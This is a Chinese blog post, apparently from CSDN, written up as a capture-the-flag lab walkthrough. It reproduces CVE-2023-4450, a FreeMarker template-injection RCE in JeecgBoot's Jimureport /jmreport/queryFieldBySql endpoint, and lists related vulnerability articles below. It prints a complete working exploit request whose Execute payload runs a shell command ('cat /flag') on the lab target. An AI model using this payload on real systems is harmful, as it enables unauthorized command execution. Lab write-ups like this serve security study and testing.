【春秋云境】CVE-2023-4450 jeect-boot queryFieldBySql接口RCE漏洞

最新推荐文章于 2025-05-20 23:21:48 发布
最新推荐文章于 2025-05-20 23:21:48 发布
阅读量1.9k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 靶场WP 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HMX404/article/details/137787062
本文介绍了JeecgBoot中的Jimureport组件在1.6.1及以下版本存在的RCE漏洞,通过未授权的API和Freemarker解析SQL语句实现远程代码执行。详细展示了漏洞利用过程,包括直接访问URL和发送特定payload获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶场介绍

JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。

开启靶场

在这里插入图片描述

漏洞利用

在搜索POC时,会发现直接访问URL是404
在这里插入图片描述
随机点击一个文档编辑,发现路径是从jmreport开始的
在这里插入图片描述


POST /jmreport/queryFieldBySql HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: */*
Accept-Encoding: gzip, deflate, br
Host: eci-2zefpkb9jv5tzsaox5zq.cloudeci1.ichunqiu.com:8080
Content-Type: application/json
Content-Length: 103

{"sql":"select '<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\" cat /flag \") }' "}

获取flag

在这里插入图片描述

JeecgBoot jmreport/queryFieldBySql RCE漏洞复现
0xSec
12-12 3389
Jeecg Boot jmreport/queryFieldBySql接口存在代码执行漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息。这种漏洞可能会导致整个应用程序被入侵,造成严重的安全问题。
Jeecg-Boot 存在前台SQL注入漏洞CVE-2023-1454】
holyxp的博客
07-02 5646
eecgBoot是一款基于BPM的低代码平台!前后端分离架构 SpringBoot 2.x,SpringCloud,Ant Design&Vue,Mybatis-plus,Shiro,JWT,支持微服务。强大的代码生成器让前后端代码一键生成,实现低代码开发!JeecgBoot引领新低代码开发模式 OnlineCoding-> 代码生成器-> 手工MERGE, 帮助Java项目解决70%的重复工作,让开发更多关注业务,既能快速提高效率,节省研发成本,同时又不失灵活性!
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
fly夏天的博客
03-20 9012
jeect-boot queryFieldBySql接口RCE漏洞(CVE-2023-4450)复现
漏洞防御实录:CVE-2023-XXXX远程代码执行漏洞修复指南
最新发布
介绍各种好的开源工具!
05-20 1187
2023年全球曝光的多个高危RCE漏洞(如CVE-2023-21768、CVE-2023-21839等)表明,此类漏洞的利用门槛正在降低,而防御复杂度却在持续攀升。• 紧急修复:针对已公开利用的漏洞(如CVE-2023-21839),直接应用厂商补丁。• 协议解析错误:如CVE-2023-21839(Weblogic T3/IIOP协议漏洞),恶意序列化数据触发远程类加载。• 权限管理失效:如CVE-2023-21554(MSMQ服务漏洞),未授权访问导致攻击者直接投递恶意消息队列。
jeect-boot积木报表 queryFieldBySql接口RCE漏洞CVE-2023-4450
qq_23003811的博客
07-23 1721
jeect-boot积木报表由于未授权的 API /jmreport/queryFieldBySql 使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。1、RCE任意命令执行。
jeect-boot RCE漏洞CVE-2023-4450
zneVue
07-17 2926
JeecgBoot 是一个开源的低代码开发平台,Jimureport 是低代码报表组件之一。当前漏洞在 1.6.1 以下的 Jimureport 组件库中都存在,由于未授权的 API`/jmreport/queryFieldBySql`使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
[CVE-2023-4450]Jeect-boot queryFieldBySql接口RCE漏洞漏洞复现
wxtnb4的博客
12-12 1475
Jeect-boot queryFieldBySql接口RCE漏洞漏洞复现
春秋 CVE-2022-4230 夺旗
05-02
### 春秋 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
春秋CVE-2023-51048 闪灵S-CMS v5.0 后台SQL注入漏洞
HMX404的博客
04-17 1107
S-CMS v5.0 被发现存在SQLI。
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
JeecgBoot jmreport/loadTableData 积木报表漏洞RCE(CVE-2023-4450)漏洞
由入门到精通
07-05 1385
Jeecg Boot jmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息由于未授权的 API使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
[漏洞复现]JeecgBoot queryFieldBySql注入内存马利用及JDBC RCE复现
LiangYueSec的博客
07-02 4474
[漏洞复现]JeecgBoot queryFieldBySql注入内存马利用及JDBC RCE复现
JEECG-BOOT存在SQL注入漏洞[附POC]
Liyu_6618的博客
02-01 2514
JEECG-BOOT存在SQL注入漏洞[附POC]
【严重】jeecg-boot/积木报表基于SSTI的任意代码执行漏洞
murphysec的博客
08-17 1808
墨菲安全是一家为您提供专业的软件供应链安全管理的科技公司,核心团队来自百度、华为、乌等企业,公司为客户提供完整的软件供应链安全管理平台,围绕SBOM提供软件全生命周期的安全管理,平台能力包括软件成分分析、源安全管理、容器镜像检测、漏洞情报预警及商业软件供应链准入评估等多个产品。官方已发布补丁:https://github.com/jeecgboot/jeecg-boot/commit/acb48179ab00e167747fa4a3e4fd3b94c78aeda5。
Jeecg-Boot qurestSql-SQL注入漏洞
weixin_43567873的博客
03-11 577
Jeecg-Boot qurestSql-SQL注入漏洞
春秋-RCE靶场漏洞复现
qq_52579508的博客
09-02 3539
CVE-2023-26469image.png靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在 Jorani 1.0.0 中,攻击者可以利用路径遍历来访问文件并在服务器上执行代码。第一步获取COOKIE:第二部构造POCPOST/session/loginHTTP/1.1...
Jeecg-Boot 未授权SQL注入漏洞CVE-2023-1454)
qq_50854662的博客
05-24 1998
Jeecg-Boot 未授权SQL注入漏洞CVE-2023-1454)
春秋CVE-2023-33440
01-12
### 关于春秋 CVE-2023-33440 漏洞详情 对于CVE-2023-33440,在当前提供的参考资料中并未直接提及此特定编号的漏洞细节。然而,基于以往处理类似安全事件的经验以及Apache Struts项目的安全公告模式[^1],可以推测这类CVE通常涉及Web应用程序框架中存在的某种形式的安全缺陷。 针对未具体说明的CVE编号,建议采取以下通用措施来应对潜在风险: #### 一、漏洞影响范围 此类漏洞可能会影响使用了受影响版本组件的应用程序,特别是那些依赖于特定功能实现的部分。例如,在之前的案例中提到的不同类型的Struts2漏洞均涉及到不同场景下的远程代码执行可能性或文件操作不当等问题[^2][^3][^4]。 #### 二、修复方案概述 为了有效缓解并最终解决由CVE-2023-33440引起的风险,应当遵循官方发布的最新指南进行更新或打补丁。一般情况下,这包括但不限于以下几个方面: - **及时升级软件**:确保所使用的Apache Struts库是最新的稳定版。 - **审查现有配置**:检查应用服务器上的所有设置是否符合最佳实践标准,尤其是与安全性有关的部分。 - **强化输入验证机制**:加强对用户提交数据的有效性和合法性校验,防止恶意构造的数据触发漏洞- **监控异常行为**:部署日志审计工具和服务端防护产品,以便快速发现任何可疑活动。 由于缺乏具体的漏洞描述和技术分析文档作为依据,上述内容仅能作为一个大致方向指导。强烈推荐查阅来自权威渠道的第一手资料获取最准确的信息。 ```bash # 假设存在一个命令用于查询最新的安全通告 curl https://struts.apache.org/security.html | grep "CVE-2023-33440" ```
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值